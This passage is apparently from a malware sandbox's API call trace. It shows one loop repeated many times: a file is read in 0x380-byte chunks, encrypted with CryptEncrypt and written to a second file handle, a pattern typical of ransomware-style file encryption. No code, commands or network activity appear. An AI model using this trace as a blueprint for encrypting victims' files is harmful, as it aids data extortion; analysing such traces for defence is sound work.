Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.753] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.755] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.756] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.756] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.757] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.757] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.758] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.758] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.759] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.759] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.760] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, 